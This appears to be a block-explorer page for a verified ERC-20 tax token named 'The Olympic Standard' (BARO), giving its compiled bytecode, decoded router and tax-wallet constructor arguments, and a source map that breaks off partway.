0x608060405260043610610134575f3560e01c80637d1db4a5116100a857806395d89b411161006d57806395d89b411461034a578063a9059cbb14610379578063bf474bed14610398578063c97c1821146103ad578063dd62ed3e146103cc578063e8078d9414610402575f80fd5b80637d1db4a5146102c75780638a8c523c146102dc5780638cd4426d146102f05780638da5cb5b1461030f5780638f9a55c014610335575f80fd5b806321bbcbb1116100f957806321bbcbb11461021057806323b872dd1461022f578063313ce5671461024e57806370a0823114610274578063715018a61461029f578063751039fc146102b3575f80fd5b806306fdde031461013f578063095ea7b3146101945780630faee56f146101c357806318160ddd146101e657806320800a00146101fa575f80fd5b3661013b57005b5f80fd5b34801561014a575f80fd5b5061017e60405180604001604052806014815260200173151a194813db1e5b5c1a58c814dd185b99185c9960621b81525081565b60405161018b919061180f565b60405180910390f35b34801561019f575f80fd5b506101b36101ae36600461187f565b610416565b604051901515815260200161018b565b3480156101ce575f80fd5b506101d860115481565b60405190815260200161018b565b3480156101f1575f80fd5b506101d861042c565b348015610205575f80fd5b5061020e610449565b005b34801561021b575f80fd5b5061020e61022a3660046118bd565b6104c0565b34801561023a575f80fd5b506101b361024936600461197d565b610548565b348015610259575f80fd5b50610262600981565b60405160ff909116815260200161018b565b34801561027f575f80fd5b506101d861028e3660046119bb565b60016020525f908152604090205481565b3480156102aa575f80fd5b5061020e6105af565b3480156102be575f80fd5b5061020e610620565b3480156102d2575f80fd5b506101d8600e5481565b3480156102e7575f80fd5b5061020e6106d1565b3480156102fb575f80fd5b5061020e61030a36600461187f565b61070f565b34801561031a575f80fd5b505f546040516001600160a01b03909116815260200161018b565b348015610340575f80fd5b506101d8600f5481565b348015610355575f80fd5b5061017e604051806040016040528060048152602001634241524f60e01b81525081565b348015610384575f80fd5b506101b361039336600461187f565b61084f565b3480156103a3575f80fd5b506101d860105481565b3480156103b8575f80fd5b5061020e6103c73660046118bd565b61085b565b3480156103d7575f80fd5b506101d86103e63660046119d6565b600260209081525f928352604080842090915290825290205481565b34801561040d575f80fd5b5061020e6108de565b5f610422338484610c37565b5060015b92915050565b6104386009600a611b01565b6104469063211d1ae3611b0f565b81565b5f546001600160a01b0316331461047b5760405162461bcd60e51b815260040161047290611b26565b60405180910390fd5b5f4711610486575f80fd5b5f80546040516001600160a01b03909116914780156108fc02929091818181858888f193505050501580156104bd573d5f803e3d5ffd5b50565b5f546001600160a01b031633146104e95760405162461bcd60e51b815260040161047290611b26565b5f5b815181101561054457600160045f84848151811061050b5761050b611b5b565b6020908102919091018101516001600160a01b031682528101919091526040015f20805460ff19169115159190911790556001016104eb565b5050565b5f610554848484610d5b565b6105a584336105a085604051806060016040528060288152602001611cba602891396001600160a01b038a165f9081526002602090815260408083203384529091529020549190611442565b610c37565b5060019392505050565b5f546001600160a01b031633146105d85760405162461bcd60e51b815260040161047290611b26565b5f80546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a35f80546001600160a01b0319169055565b5f546001600160a01b031633146106495760405162461bcd60e51b815260040161047290611b26565b6106556009600a611b01565b6106639063211d1ae3611b0f565b600e556106726009600a611b01565b6106809063211d1ae3611b0f565b600f557f947f344d56e1e8c70dc492fb94c4ddddd490c016aab685f5e7e47b2e85cb44cf6106b06009600a611b01565b6106be9063211d1ae3611b0f565b60405190815260200160405180910390a1565b5f546001600160a01b031633146106fa5760405162461bcd60e51b815260040161047290611b26565b6013805460ff60a01b1916600160a01b179055565b5f546001600160a01b031633146107385760405162461bcd60e51b815260040161047290611b26565b6040516370a0823160e01b81523060048201525f906107b9906064906107b39085906001600160a01b038816906370a0823190602401602060405180830381865afa158015610789573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906107ad9190611b6f565b9061147a565b906114ff565b9050826001600160a01b031663a9059cbb6107db5f546001600160a01b031690565b6040516001600160e01b031960e084901b1681526001600160a01b039091166004820152602481018490526044016020604051808303815f875af1158015610825573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906108499190611b86565b50505050565b5f610422338484610d5b565b5f546001600160a01b031633146108845760405162461bcd60e51b815260040161047290611b26565b5f5b8151811015610544575f60045f8484815181106108a5576108a5611b5b565b6020908102919091018101516001600160a01b031682528101919091526040015f20805460ff1916911515919091179055600101610886565b5f546001600160a01b031633146109075760405162461bcd60e51b815260040161047290611b26565b601354600160a01b900460ff16156109615760405162461bcd60e51b815260206004820152601760248201527f74726164696e6720697320616c7265616479206f70656e0000000000000000006044820152606401610472565b60125461098d9030906001600160a01b031661097f6009600a611b01565b6105a09063211d1ae3611b0f565b60125f9054906101000a90046001600160a01b03166001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa1580156109dd573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610a019190611ba5565b6001600160a01b031663c9c653963060125f9054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610a60573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610a849190611ba5565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303815f875af1158015610ace573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610af29190611ba5565b601380546001600160a01b0319166001600160a01b03928316179055601254305f8181526001602052604081205481549385169463f305d719944794939182911660405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af1158015610b99573d5f803e3d5ffd5b50505050506040513d601f19601f82011682018060405250810190610bbe9190611bc0565b505060135460125460405163095ea7b360e01b81526001600160a01b0391821660048201525f1960248201529116915063095ea7b3906044016020604051808303815f875af1158015610c13573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906104bd9190611b86565b6001600160a01b038316610c995760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610472565b6001600160a01b038216610cfa5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610472565b6001600160a01b038381165f8181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b038316610dbf5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610472565b6001600160a01b038216610e215760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610472565b5f8111610e825760405162461bcd60e51b815260206004820152602960248201527f5472616e7366657220616d6f756e74206d7573742062652067726561746572206044820152687468616e207a65726f60b81b6064820152608401610472565b601354600160a01b900460ff161580610ea45750601354600160a81b900460ff165b15610f91576001600160a01b0383165f9081526003602052604090205460ff1680610ee657506001600160a01b0382165f9081526003602052604090205460ff165b610eee575f80fd5b6001600160a01b0383165f90815260016020526040902054610f109082611540565b6001600160a01b038085165f908152600160205260408082209390935590841681522054610f3e9082611581565b6001600160a01b038084165f8181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610d4e9085815260200190565b6015545f80546001600160a01b03868116911614801590610fbf57505f546001600160a01b03858116911614155b8015610fd957506005546001600160a01b03858116911614155b156112fb576001600160a01b0385165f9081526004602052604090205460ff1615801561101e57506001600160a01b0384165f9081526004602052604090205460ff16155b611026575f80fd5b6013546001600160a01b03868116911614801561105157506012546001600160a01b03858116911614155b801561107557506001600160a01b0384165f9081526003602052604090205460ff16155b156111cd57601354600160a01b900460ff166110ca5760405162461bcd60e51b8152602060048201526014602482015273151c98591a5b99c81b9bdd081bdc195b881e595d60621b6044820152606401610472565b600e5483111561111c5760405162461bcd60e51b815260206004820152601960248201527f4578636565647320746865205f6d61785478416d6f756e742e000000000000006044820152606401610472565b600f546001600160a01b0385165f90815260016020526040902054611142908590611beb565b11156111905760405162461bcd60e51b815260206004820152601a60248201527f4578636565647320746865206d617857616c6c657453697a652e0000000000006044820152606401610472565b6111b660646107b3600a54600d54116111ab576006546111af565b6008545b869061147a565b600d80549192505f6111c783611bfe565b91905055505b6111d785846115df565b6013549092506001600160a01b03858116911614801561120057506001600160a01b0385163014155b1561122d5761122a60646107b3600b54600d5411611220576007546111af565b600954869061147a565b90505b305f90815260016020526040902054601354600160a81b900460ff1615801561126357506013546001600160a01b038681169116145b80156112785750601354600160a01b900460ff165b8015611285575060105481115b80156112945750600c54600d54115b156112da576015544311156112a8575f6014555b6112c56112c0856112bb84601154611628565b611628565b61163c565b60148054905f6112d483611bfe565b91905055505b6013546001600160a01b03908116908616036112f9576112f9476117ac565b505b801561137357305f9081526001602052604090205461131a9082611581565b305f81815260016020526040908190209290925590516001600160a01b038716907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9061136a9085815260200190565b60405180910390a35b61139e6113808385611c16565b6001600160a01b0387165f9081526001602052604090205490611540565b6001600160a01b0386165f908152600160205260409020556113e16113c38483611540565b6001600160a01b0386165f9081526001602052604090205490611581565b6001600160a01b038086165f8181526001602052604090209290925586167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef61142a8685611540565b60405190815260200160405180910390a35050505050565b5f81848411156114655760405162461bcd60e51b8152600401610472919061180f565b505f6114718486611c16565b95945050505050565b5f825f0361148957505f610426565b5f6114948385611b0f565b9050826114a18583611c29565b146114f85760405162461bcd60e51b815260206004820152602160248201527f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f6044820152607760f81b6064820152608401610472565b9392505050565b5f6114f883836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f0000000000008152506117e3565b5f6114f883836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250611442565b5f8061158d8385611beb565b9050838110156114f85760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f7700000000006044820152606401610472565b6001600160a01b0382165f9081526003602052604081205460ff168061161e5761161960646107b36008548661147a90919063ffffffff16565b611620565b825b949350505050565b5f81831161163657826114f8565b50919050565b6013805460ff60a81b1916600160a81b1790556040805160028082526060820183525f9260208301908036833701905050905030815f8151811061168257611682611b5b565b6001600160a01b03928316602091820292909201810191909152601254604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa1580156116d9573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906116fd9190611ba5565b8160018151811061171057611710611b5b565b6001600160a01b0392831660209182029290920101526012546117369130911684610c37565b60125460405163791ac94760e01b81526001600160a01b039091169063791ac9479061176e9085905f90869030904290600401611c48565b5f604051808303815f87803b158015611785575f80fd5b505af1158015611797573d5f803e3d5ffd5b50506013805460ff60a81b1916905550505050565b6005546040516001600160a01b039091169082156108fc029083905f818181858888f19350505050158015610544573d5f803e3d5ffd5b5f81836118035760405162461bcd60e51b8152600401610472919061180f565b505f6114718486611c29565b5f602080835283518060208501525f5b8181101561183b5785810183015185820160400152820161181f565b505f604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b03811681146104bd575f80fd5b803561187a8161185b565b919050565b5f8060408385031215611890575f80fd5b823561189b8161185b565b946020939093013593505050565b634e487b7160e01b5f52604160045260245ffd5b5f60208083850312156118ce575f80fd5b823567ffffffffffffffff808211156118e5575f80fd5b818501915085601f8301126118f8575f80fd5b81358181111561190a5761190a6118a9565b8060051b604051601f19603f8301168101818110858211171561192f5761192f6118a9565b60405291825284820192508381018501918883111561194c575f80fd5b938501935b82851015611971576119628561186f565b84529385019392850192611951565b98975050505050505050565b5f805f6060848603121561198f575f80fd5b833561199a8161185b565b925060208401356119aa8161185b565b929592945050506040919091013590565b5f602082840312156119cb575f80fd5b81356114f88161185b565b5f80604083850312156119e7575f80fd5b82356119f28161185b565b91506020830135611a028161185b565b809150509250929050565b634e487b7160e01b5f52601160045260245ffd5b600181815b80851115611a5b57815f1904821115611a4157611a41611a0d565b80851615611a4e57918102915b93841c9390800290611a26565b509250929050565b5f82611a7157506001610426565b81611a7d57505f610426565b8160018114611a935760028114611a9d57611ab9565b6001915050610426565b60ff841115611aae57611aae611a0d565b50506001821b610426565b5060208310610133831016604e8410600b8410161715611adc575081810a610426565b611ae68383611a21565b805f1904821115611af957611af9611a0d565b029392505050565b5f6114f860ff841683611a63565b808202811582820484141761042657610426611a0d565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b634e487b7160e01b5f52603260045260245ffd5b5f60208284031215611b7f575f80fd5b5051919050565b5f60208284031215611b96575f80fd5b815180151581146114f8575f80fd5b5f60208284031215611bb5575f80fd5b81516114f88161185b565b5f805f60608486031215611bd2575f80fd5b8351925060208401519150604084015190509250925092565b8082018082111561042657610426611a0d565b5f60018201611c0f57611c0f611a0d565b5060010190565b8181038181111561042657610426611a0d565b5f82611c4357634e487b7160e01b5f52601260045260245ffd5b500490565b5f60a08201878352602087602085015260a0604085015281875180845260c0860191506020890193505f5b81811015611c985784516001600160a01b031683529383019391830191600101611c73565b50506001600160a01b0396909616606085015250505060800152939250505056fe45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a264697066735822122062add457b344c4a13c367cd54db7c93b9ca5c05b29f2cd2f54fa3b38cff6dac964736f6c63430008180033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d000000000000000000000000711aacece5f007d9a8223f9393c9d9a25f08af4c

-----Decoded View---------------
Arg [0] : router_ (address): 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D
Arg [1] : taxWallet_ (address): 0x711AaCECe5f007D9A8223F9393C9d9A25F08Af4c

-----Encoded View---------------
2 Constructor Arguments found :
Arg [0] : 0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d
Arg [1] : 000000000000000000000000711aacece5f007d9a8223f9393c9d9a25f08af4c


Deployed Bytecode Sourcemap

3876:8493:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;4675:59;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;4675:59:0;;;;;;;;;;;;:::i;:::-;;;;;;;;6047:186;;;;;;;;;;-1:-1:-1;6047:186:0;;;;;:::i;:::-;;:::i;:::-;;;1327:14:1;;1320:22;1302:41;;1290:2;1275:18;6047:186:0;1162:187:1;4991:56:0;;;;;;;;;;;;;;;;;;;1500:25:1;;;1488:2;1473:18;4991:56:0;1354:177:1;4602:66:0;;;;;;;;;;;;;:::i;12214:152::-;;;;;;;;;;;;;:::i;:::-;;10811:164;;;;;;;;;;-1:-1:-1;10811:164:0;;;;;:::i;:::-;;:::i;6241:443::-;;;;;;;;;;-1:-1:-1;6241:443:0;;;;;:::i;:::-;;:::i;4561:34::-;;;;;;;;;;;;4594:1;4561:34;;;;;3427:4:1;3415:17;;;3397:36;;3385:2;3370:18;4561:34:0;3255:184:1;3969:44:0;;;;;;;;;;-1:-1:-1;3969:44:0;;;;;:::i;:::-;;;;;;;;;;;;;;2901:148;;;;;;;;;;;;;:::i;10528:174::-;;;;;;;;;;;;;:::i;4793:57::-;;;;;;;;;;;;;;;;11848:84;;;;;;;;;;;;;:::i;11977:229::-;;;;;;;;;;-1:-1:-1;11977:229:0;;;;;:::i;:::-;;:::i;2687:79::-;;;;;;;;;;-1:-1:-1;2725:7:0;2752:6;2687:79;;-1:-1:-1;;;;;2752:6:0;;;3842:51:1;;3830:2;3815:18;2687:79:0;3696:203:1;4857:59:0;;;;;;;;;;;;;;;;4741:45;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;4741:45:0;;;;;5848:191;;;;;;;;;;-1:-1:-1;5848:191:0;;;;;:::i;:::-;;:::i;4923:61::-;;;;;;;;;;;;;;;;10983:168;;;;;;;;;;-1:-1:-1;10983:168:0;;;;;:::i;:::-;;:::i;4020:64::-;;;;;;;;;;-1:-1:-1;4020:64:0;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;11159:681;;;;;;;;;;;;;:::i;6047:186::-;6147:4;6164:39;302:10;6187:7;6196:6;6164:8;:39::i;:::-;-1:-1:-1;6221:4:0;6047:186;;;;;:::o;4602:66::-;4654:14;4594:1;4654:2;:14;:::i;:::-;4640:28;;:11;:28;:::i;:::-;4602:66;:::o;12214:152::-;2814:6;;-1:-1:-1;;;;;2814:6:0;302:10;2814:22;2806:67;;;;-1:-1:-1;;;2806:67:0;;;;;;;:::i;:::-;;;;;;;;;12297:1:::1;12273:21;:25;12265:34;;;::::0;::::1;;2725:7:::0;2752:6;;12310:48:::1;::::0;-1:-1:-1;;;;;2752:6:0;;;;12336:21:::1;12310:48:::0;::::1;;;::::0;12336:21;;12310:48;2725:7;12310:48;12336:21;2752:6;12310:48;::::1;;;;;;;;;;;;;::::0;::::1;;;;;;12214:152::o:0;10811:164::-;2814:6;;-1:-1:-1;;;;;2814:6:0;302:10;2814:22;2806:67;;;;-1:-1:-1;;;2806:67:0;;;;;;;:::i;:::-;10884:6:::1;10879:89;10900:5;:12;10896:1;:16;10879:89;;;10952:4;10934:5;:15;10940:5;10946:1;10940:8;;;;;;;;:::i;:::-;;::::0;;::::1;::::0;;;;;;;-1:-1:-1;;;;;10934:15:0::1;::::0;;;::::1;::::0;;;;;;-1:-1:-1;10934:15:0;:22;;-1:-1:-1;;10934:22:0::1;::::0;::::1;;::::0;;;::::1;::::0;;-1:-1:-1;10914:3:0::1;10879:89;;;;10811:164:::0;:::o;6241:443::-;6373:4;6390:35;6399:6;6407:9;6418:6;6390:8;:35::i;:::-;6436:218;6459:6;302:10;6507:136;6561:6;6507:136;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;6507:17:0;;;;;;:9;:17;;;;;;;;302:10;6507:31;;;;;;;;;;:35;:136::i;:::-;6436:8;:218::i;:::-;-1:-1:-1;6672:4:0;6241:443;;;;;:::o;2901:148::-;2814:6;;-1:-1:-1;;;;;2814:6:0;302:10;2814:22;2806:67;;;;-1:-1:-1;;;2806:67:0;;;;;;;:::i;:::-;3008:1:::1;2992:6:::0;;2971:40:::1;::::0;-1:-1:-1;;;;;2992:6:0;;::::1;::::0;2971:40:::1;::::0;3008:1;;2971:40:::1;3039:1;3022:19:::0;;-1:-1:-1;;;;;;3022:19:0::1;::::0;;2901:148::o;10528:174::-;2814:6;;-1:-1:-1;;;;;2814:6:0;302:10;2814:22;2806:67;;;;-1:-1:-1;;;2806:67:0;;;;;;;:::i;:::-;4654:14:::1;4594:1;4654:2;:14;:::i;:::-;4640:28;::::0;:11:::1;:28;:::i;:::-;10582:12;:26:::0;4654:14:::1;4594:1;4654:2;:14;:::i;:::-;4640:28;::::0;:11:::1;:28;:::i;:::-;10619:14;:28:::0;10663:31:::1;4654:14;4594:1;4654:2;:14;:::i;:::-;4640:28;::::0;:11:::1;:28;:::i;:::-;10663:31;::::0;1500:25:1;;;1488:2;1473:18;10663:31:0::1;;;;;;;10528:174::o:0;11848:84::-;2814:6;;-1:-1:-1;;;;;2814:6:0;302:10;2814:22;2806:67;;;;-1:-1:-1;;;2806:67:0;;;;;;;:::i;:::-;11903:14:::1;:21:::0;;-1:-1:-1;;;;11903:21:0::1;-1:-1:-1::0;;;11903:21:0::1;::::0;;11848:84::o;11977:229::-;2814:6;;-1:-1:-1;;;;;2814:6:0;302:10;2814:22;2806:67;;;;-1:-1:-1;;;2806:67:0;;;;;;;:::i;:::-;12081:41:::1;::::0;-1:-1:-1;;;12081:41:0;;12116:4:::1;12081:41;::::0;::::1;3842:51:1::0;12063:15:0::1;::::0;12081:63:::1;::::0;12140:3:::1;::::0;12081:54:::1;::::0;12127:7;;-1:-1:-1;;;;;12081:26:0;::::1;::::0;::::1;::::0;3815:18:1;;12081:41:0::1;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;:45:::0;::::1;:54::i;:::-;:58:::0;::::1;:63::i;:::-;12063:81;;12162:8;-1:-1:-1::0;;;;;12155:25:0::1;;12181:7;2725::::0;2752:6;-1:-1:-1;;;;;2752:6:0;;2687:79;12181:7:::1;12155:43;::::0;-1:-1:-1;;;;;;12155:43:0::1;::::0;;;;;;-1:-1:-1;;;;;6853:32:1;;;12155:43:0::1;::::0;::::1;6835:51:1::0;6902:18;;;6895:34;;;6808:18;;12155:43:0::1;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;12052:154;11977:229:::0;;:::o;5848:191::-;5951:4;5968:41;302:10;5991:9;6002:6;5968:8;:41::i;10983:168::-;2814:6;;-1:-1:-1;;;;;2814:6:0;302:10;2814:22;2806:67;;;;-1:-1:-1;;;2806:67:0;;;;;;;:::i;:::-;11057:6:::1;11052:92;11073:6;:13;11069:1;:17;11052:92;;;11127:5;11108;:16;11114:6;11121:1;11114:9;;;;;;;;:::i;:::-;;::::0;;::::1;::::0;;;;;;;-1:-1:-1;;;;;11108:16:0::1;::::0;;;::::1;::::0;;;;;;-1:-1:-1;11108:16:0;:24;;-1:-1:-1;;11108:24:0::1;::::0;::::1;;::::0;;;::::1;::::0;;-1:-1:-1;11088:3:0::1;11052:92;;11159:681:::0;2814:6;;-1:-1:-1;;;;;2814:6:0;302:10;2814:22;2806:67;;;;-1:-1:-1;;;2806:67:0;;;;;;;:::i;:::-;11222:14:::1;::::0;-1:-1:-1;;;11222:14:0;::::1;;;11221:15;11213:51;;;::::0;-1:-1:-1;;;11213:51:0;;7424:2:1;11213:51:0::1;::::0;::::1;7406:21:1::0;7463:2;7443:18;;;7436:30;7502:25;7482:18;;;7475:53;7545:18;;11213:51:0::1;7222:347:1::0;11213:51:0::1;11307:16;::::0;11275:63:::1;::::0;11292:4:::1;::::0;-1:-1:-1;;;;;11307:16:0::1;4654:14;4594:1;4654:2;:14;:::i;:::-;4640:28;::::0;:11:::1;:28;:::i;11275:63::-;11384:16;;;;;;;;;-1:-1:-1::0;;;;;11384:16:0::1;-1:-1:-1::0;;;;;11384:24:0::1;;:26;;;;;;;;;;;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1::0;;;;;11366:70:0::1;;11445:4;11452:16;;;;;;;;;-1:-1:-1::0;;;;;11452:16:0::1;-1:-1:-1::0;;;;;11452:21:0::1;;:23;;;;;;;;;;;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;11366:110;::::0;-1:-1:-1;;;;;;11366:110:0::1;::::0;;;;;;-1:-1:-1;;;;;8060:15:1;;;11366:110:0::1;::::0;::::1;8042:34:1::0;8112:15;;8092:18;;;8085:43;7977:18;;11366:110:0::1;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;11349:14;:127:::0;;-1:-1:-1;;;;;;11349:127:0::1;-1:-1:-1::0;;;;;11349:127:0;;::::1;;::::0;;11487:16:::1;::::0;11572:4:::1;-1:-1:-1::0;11592:24:0;;;-1:-1:-1;11592:24:0::1;::::0;;;;;2752:6;;11487:16;;::::1;::::0;:32:::1;::::0;11527:21:::1;::::0;11572:4;-1:-1:-1;;;2752:6:0;11487:224:::1;::::0;::::1;::::0;;;-1:-1:-1;;;;;;11487:224:0;;;-1:-1:-1;;;;;8498:15:1;;;11487:224:0::1;::::0;::::1;8480:34:1::0;8530:18;;;8523:34;;;;8573:18;;;8566:34;;;;8616:18;;;8609:34;8680:15;;;8659:19;;;8652:44;11685:15:0::1;8712:19:1::0;;;8705:35;8414:19;;11487:224:0::1;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1::0;;11729:14:0::1;::::0;11775:16:::1;::::0;11722:110:::1;::::0;-1:-1:-1;;;11722:110:0;;-1:-1:-1;;;;;11775:16:0;;::::1;11722:110;::::0;::::1;6835:51:1::0;-1:-1:-1;;6902:18:1;;;6895:34;11729:14:0;::::1;::::0;-1:-1:-1;11722:30:0::1;::::0;6808:18:1;;11722:110:0::1;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;6692:333::-:0;-1:-1:-1;;;;;6785:19:0;;6777:68;;;;-1:-1:-1;;;6777:68:0;;9264:2:1;6777:68:0;;;9246:21:1;9303:2;9283:18;;;9276:30;9342:34;9322:18;;;9315:62;-1:-1:-1;;;9393:18:1;;;9386:34;9437:19;;6777:68:0;9062:400:1;6777:68:0;-1:-1:-1;;;;;6864:21:0;;6856:68;;;;-1:-1:-1;;;6856:68:0;;9669:2:1;6856:68:0;;;9651:21:1;9708:2;9688:18;;;9681:30;9747:34;9727:18;;;9720:62;-1:-1:-1;;;9798:18:1;;;9791:32;9840:19;;6856:68:0;9467:398:1;6856:68:0;-1:-1:-1;;;;;6935:16:0;;;;;;;:9;:16;;;;;;;;:25;;;;;;;;;;;;;:34;;;6985:32;;1500:25:1;;;6985:32:0;;1473:18:1;6985:32:0;;;;;;;;6692:333;;;:::o;7033:2637::-;-1:-1:-1;;;;;7118:19:0;;7110:69;;;;-1:-1:-1;;;7110:69:0;;10072:2:1;7110:69:0;;;10054:21:1;10111:2;10091:18;;;10084:30;10150:34;10130:18;;;10123:62;-1:-1:-1;;;10201:18:1;;;10194:35;10246:19;;7110:69:0;9870:401:1;7110:69:0;-1:-1:-1;;;;;7198:18:0;;7190:66;;;;-1:-1:-1;;;7190:66:0;;10478:2:1;7190:66:0;;;10460:21:1;10517:2;10497:18;;;10490:30;10556:34;10536:18;;;10529:62;-1:-1:-1;;;10607:18:1;;;10600:33;10650:19;;7190:66:0;10276:399:1;7190:66:0;7282:1;7275:4;:8;7267:62;;;;-1:-1:-1;;;7267:62:0;;10882:2:1;7267:62:0;;;10864:21:1;10921:2;10901:18;;;10894:30;10960:34;10940:18;;;10933:62;-1:-1:-1;;;11011:18:1;;;11004:39;11060:19;;7267:62:0;10680:405:1;7267:62:0;7345:14;;-1:-1:-1;;;7345:14:0;;;;7344:15;;:28;;-1:-1:-1;7363:9:0;;-1:-1:-1;;;7363:9:0;;;;7344:28;7340:293;;;-1:-1:-1;;;;;7397:17:0;;;;;;:10;:17;;;;;;;;;:37;;-1:-1:-1;;;;;;7418:16:0;;;;;;:10;:16;;;;;;;;7397:37;7389:46;;;;;;-1:-1:-1;;;;;7469:16:0;;;;;;:9;:16;;;;;;:26;;7490:4;7469:20;:26::i;:::-;-1:-1:-1;;;;;7450:16:0;;;;;;;:9;:16;;;;;;:45;;;;7528:15;;;;;;;:25;;7548:4;7528:19;:25::i;:::-;-1:-1:-1;;;;;7510:15:0;;;;;;;:9;:15;;;;;;;:43;;;;7573:27;;;;;;;;;;7595:4;1500:25:1;;1488:2;1473:18;;1354:177;7340:293:0;7659:16;;7643:13;2752:6;;-1:-1:-1;;;;;7719:16:0;;;2752:6;;7719:16;;;;:35;;-1:-1:-1;2725:7:0;2752:6;-1:-1:-1;;;;;7739:15:0;;;2752:6;;7739:15;;7719:35;:58;;;;-1:-1:-1;7766:11:0;;-1:-1:-1;;;;;7758:19:0;;;7766:11;;7758:19;;7719:58;7715:1587;;;-1:-1:-1;;;;;7803:12:0;;;;;;:5;:12;;;;;;;;7802:13;:29;;;;-1:-1:-1;;;;;;7820:11:0;;;;;;:5;:11;;;;;;;;7819:12;7802:29;7794:38;;;;;;7862:14;;-1:-1:-1;;;;;7853:23:0;;;7862:14;;7853:23;:60;;;;-1:-1:-1;7896:16:0;;-1:-1:-1;;;;;7880:33:0;;;7896:16;;7880:33;;7853:60;:81;;;;-1:-1:-1;;;;;;7918:16:0;;;;;;:10;:16;;;;;;;;7917:17;7853:81;7849:667;;;7963:14;;-1:-1:-1;;;7963:14:0;;;;7955:47;;;;-1:-1:-1;;;7955:47:0;;11292:2:1;7955:47:0;;;11274:21:1;11331:2;11311:18;;;11304:30;-1:-1:-1;;;11350:18:1;;;11343:50;11410:18;;7955:47:0;11090:344:1;7955:47:0;8037:12;;8029:4;:20;;8021:58;;;;-1:-1:-1;;;8021:58:0;;11641:2:1;8021:58:0;;;11623:21:1;11680:2;11660:18;;;11653:30;11719:27;11699:18;;;11692:55;11764:18;;8021:58:0;11439:349:1;8021:58:0;8132:14;;-1:-1:-1;;;;;8106:15:0;;;;;;:9;:15;;;;;;:22;;8124:4;;8106:22;:::i;:::-;:40;;8098:79;;;;-1:-1:-1;;;8098:79:0;;12125:2:1;8098:79:0;;;12107:21:1;12164:2;12144:18;;;12137:30;12203:28;12183:18;;;12176:56;12249:18;;8098:79:0;11923:350:1;8098:79:0;8205;8280:3;8205:70;8227:15;;8215:9;;:27;8214:60;;8260:14;;8214:60;;;8246:12;;8214:60;8205:4;;:8;:70::i;:79::-;8303:9;:11;;8196:88;;-1:-1:-1;8303:9:0;:11;;;:::i;:::-;;;;;;7849:667;8543:32;8563:4;8570;8543:19;:32::i;:::-;8619:14;;8535:40;;-1:-1:-1;;;;;;8611:22:0;;;8619:14;;8611:22;:48;;;;-1:-1:-1;;;;;;8637:22:0;;8654:4;8637:22;;8611:48;8607:181;;;8689:83;8768:3;8689:74;8711:16;;8699:9;;:28;8698:6